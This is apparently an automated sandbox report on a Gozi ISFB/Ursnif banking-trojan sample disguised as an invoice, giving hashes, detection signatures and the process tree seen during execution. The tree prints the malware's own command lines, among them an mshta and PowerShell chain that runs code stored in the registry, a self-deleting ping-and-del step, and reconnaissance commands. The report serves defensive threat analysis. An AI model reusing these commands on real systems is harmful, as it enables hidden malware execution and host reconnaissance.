Overview

overview

10

Static

static

invoice_96...ip.exe

windows7_x64

10

invoice_96...ip.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    05-10-2020 14:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice_96733093_10.20.zip.exe

  • Size

    327KB

  • MD5

    ff449329c25e3baa889cf72a5ccb9473

  • SHA1

    d973b0267c639359cbcd8828e8f8e5a78ad85e80

  • SHA256

    303516a866cfe388024135d1e3825f7b3e14e8f75d0b609ed5397b704697b8f7

  • SHA512

    e535b33d86549dc51429ba575cfa3d02d1617dbbc5c697bbcf71cf6080055d0b8e54cce93e3784f7235e875ebbd4a2da82956547b87bc38ce8e0f2b2201d0637

Score
10/10
spywarebankertrojangozi_ifsbursnif

Malware Config

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • ServiceHost packer 3 IoCs

    Detects ServiceHost packer used for .NET malware

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Suspicious use of SetThreadContext 12 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
    discovery
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 44 IoCs
    adwarespyware
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2164 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 105 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 133 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2996
    • C:\Users\Admin\AppData\Local\Temp\invoice_96733093_10.20.zip.exe
      "C:\Users\Admin\AppData\Local\Temp\invoice_96733093_10.20.zip.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:3952
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\BAD223C3-D1C2-FC1D-2B8E-95F08FA29924\\\AzSqeter'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4020
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\BAD223C3-D1C2-FC1D-2B8E-95F08FA29924").amstartv))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3788
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fikjbqki\fikjbqki.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:804
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9550.tmp" "c:\Users\Admin\AppData\Local\Temp\fikjbqki\CSCA47D8B19D9D4BB5B39B21D85FB3B1F.TMP"
            5⤵
              PID:2276
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jbqupeaf\jbqupeaf.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3948
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9679.tmp" "c:\Users\Admin\AppData\Local\Temp\jbqupeaf\CSC7E378EB532B04CC488BF8A9B75EC11D2.TMP"
              5⤵
                PID:2404
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\invoice_96733093_10.20.zip.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1720
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:1172
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\570A.bi1"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3612
          • C:\Windows\system32\nslookup.exe
            nslookup myip.opendns.com resolver1.opendns.com
            3⤵
              PID:2128
          • C:\Windows\system32\cmd.exe
            cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\7B79.bi1"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2420
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:2272
            • C:\Windows\system32\cmd.exe
              cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\570A.bi1"
              2⤵
                PID:3948
              • C:\Windows\system32\cmd.exe
                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\7B79.bi1"
                2⤵
                  PID:1808
                • C:\Windows\system32\cmd.exe
                  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\2177.bin1"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3788
                  • C:\Windows\system32\systeminfo.exe
                    systeminfo.exe
                    3⤵
                    • Gathers system information
                    PID:3664
                • C:\Program Files\Windows Mail\WinMail.exe
                  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                  2⤵
                    PID:2000
                  • C:\Windows\syswow64\cmd.exe
                    "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
                    2⤵
                      PID:1640
                    • C:\Users\Admin\AppData\Local\Temp\259303562.exe
                      "C:\Users\Admin\AppData\Local\Temp\259303562.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:2456
                    • C:\Windows\system32\cmd.exe
                      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2177.bin1"
                      2⤵
                        PID:3160
                      • C:\Windows\system32\cmd.exe
                        cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\2177.bin1"
                        2⤵
                          PID:2052
                          • C:\Windows\system32\net.exe
                            net view
                            3⤵
                            • Discovers systems in the same network
                            PID:2000
                        • C:\Windows\system32\cmd.exe
                          cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2177.bin1"
                          2⤵
                            PID:2272
                          • C:\Windows\system32\cmd.exe
                            cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\2177.bin1"
                            2⤵
                              PID:208
                              • C:\Windows\system32\nslookup.exe
                                nslookup 127.0.0.1
                                3⤵
                                  PID:2060
                              • C:\Windows\system32\cmd.exe
                                cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2177.bin1"
                                2⤵
                                  PID:3268
                                • C:\Windows\system32\cmd.exe
                                  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\2177.bin1"
                                  2⤵
                                    PID:408
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist.exe /SVC
                                      3⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1720
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2177.bin1"
                                    2⤵
                                      PID:3520
                                    • C:\Windows\system32\cmd.exe
                                      cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\2177.bin1"
                                      2⤵
                                        PID:3584
                                        • C:\Windows\system32\driverquery.exe
                                          driverquery.exe
                                          3⤵
                                            PID:2052
                                        • C:\Windows\System32\mshta.exe
                                          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\BAD223C3-D1C2-FC1D-2B8E-95F08FA29924\\\AzSqeter'));if(!window.flag)close()</script>"
                                          2⤵
                                            PID:800
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\BAD223C3-D1C2-FC1D-2B8E-95F08FA29924").amstartv))
                                              3⤵
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: MapViewOfSection
                                              PID:3804
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4yebzvnp\4yebzvnp.cmdline"
                                                4⤵
                                                  PID:2052
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA77.tmp" "c:\Users\Admin\AppData\Local\Temp\4yebzvnp\CSCB7A870862C954A4FAF2C305AC542292A.TMP"
                                                    5⤵
                                                      PID:188
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tkt5lv0p\tkt5lv0p.cmdline"
                                                    4⤵
                                                      PID:408
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC9A.tmp" "c:\Users\Admin\AppData\Local\Temp\tkt5lv0p\CSCA0E5E7A56D2B4590927FCB3F722BDC57.TMP"
                                                        5⤵
                                                          PID:1280
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\259303562.exe"
                                                    2⤵
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious behavior: MapViewOfSection
                                                    PID:3728
                                                    • C:\Windows\system32\PING.EXE
                                                      ping localhost -n 5
                                                      3⤵
                                                      • Runs ping.exe
                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                      PID:2144
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\86D0.bi1"
                                                    2⤵
                                                      PID:3744
                                                      • C:\Windows\system32\nslookup.exe
                                                        nslookup myip.opendns.com resolver1.opendns.com
                                                        3⤵
                                                          PID:1732
                                                      • C:\Windows\system32\cmd.exe
                                                        cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\86D0.bi1"
                                                        2⤵
                                                          PID:1676
                                                        • C:\Windows\system32\makecab.exe
                                                          makecab.exe /F "C:\Users\Admin\AppData\Local\Temp\B1A2.bin"
                                                          2⤵
                                                            PID:3664
                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          1⤵
                                                            PID:3392
                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                            "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                            1⤵
                                                            • Modifies Internet Explorer settings
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of SetWindowsHookEx
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:1676
                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1676 CREDAT:82945 /prefetch:2
                                                              2⤵
                                                              • Modifies Internet Explorer settings
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2056
                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1676 CREDAT:82950 /prefetch:2
                                                              2⤵
                                                              • Modifies Internet Explorer settings
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2840

                                                          Network

                                                          MITRE ATT&CK Enterprise v6

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • memory/1640-56-0x0000000001116CD0-0x0000000001116CD4-memory.dmp

                                                            Filesize

                                                            4B

                                                            Download

                                                          • memory/1720-35-0x000002DC5BBC0000-0x000002DC5BC5A000-memory.dmp

                                                            Filesize

                                                            616KB

                                                            Download

                                                          • memory/2456-65-0x0000000000F6D000-0x0000000000F6E000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download

                                                          • memory/2456-66-0x00000000033B0000-0x00000000033B1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download

                                                          • memory/2996-32-0x0000000002830000-0x00000000028CA000-memory.dmp

                                                            Filesize

                                                            616KB

                                                            Download

                                                          • memory/2996-30-0x0000000002830000-0x00000000028CA000-memory.dmp

                                                            Filesize

                                                            616KB

                                                            Download

                                                          • memory/2996-29-0x0000000004FB0000-0x000000000504A000-memory.dmp

                                                            Filesize

                                                            616KB

                                                            Download

                                                          • memory/2996-119-0x0000000005C30000-0x0000000005CCA000-memory.dmp

                                                            Filesize

                                                            616KB

                                                            Download

                                                          • memory/2996-114-0x00007FF8DF01D9F0-0x00007FF8DF01D9F4-memory.dmp

                                                            Filesize

                                                            4B

                                                            Download

                                                          • memory/2996-125-0x0000000005C30000-0x0000000005CCA000-memory.dmp

                                                            Filesize

                                                            616KB

                                                            Download

                                                          • memory/3728-129-0x000001D92B590000-0x000001D92B62A000-memory.dmp

                                                            Filesize

                                                            616KB

                                                            Download

                                                          • memory/3788-7-0x00007FF8C0960000-0x00007FF8C134C000-memory.dmp

                                                            Filesize

                                                            9.9MB

                                                            Download

                                                          • memory/3788-27-0x000002829CE70000-0x000002829CF0A000-memory.dmp

                                                            Filesize

                                                            616KB

                                                            Download

                                                          • memory/3788-8-0x0000028282840000-0x0000028282841000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download

                                                          • memory/3788-25-0x000002829CCE0000-0x000002829CCE1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download

                                                          • memory/3788-17-0x0000028282870000-0x0000028282871000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download

                                                          • memory/3788-9-0x000002829CD60000-0x000002829CD61000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download

                                                          • memory/3804-105-0x000001FF0B480000-0x000001FF0B481000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download

                                                          • memory/3804-94-0x00007FF8C22C0000-0x00007FF8C2CAC000-memory.dmp

                                                            Filesize

                                                            9.9MB

                                                            Download

                                                          • memory/3804-115-0x000001FF25BF0000-0x000001FF25C8A000-memory.dmp

                                                            Filesize

                                                            616KB

                                                            Download

                                                          • memory/3804-113-0x000001FF0B4B0000-0x000001FF0B4B1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download

                                                          • memory/3952-0-0x0000000000E53000-0x0000000000E54000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download

                                                          • memory/3952-1-0x00000000012C0000-0x00000000012C1000-memory.dmp

                                                            Filesize

                                                            4KB

                                                            Download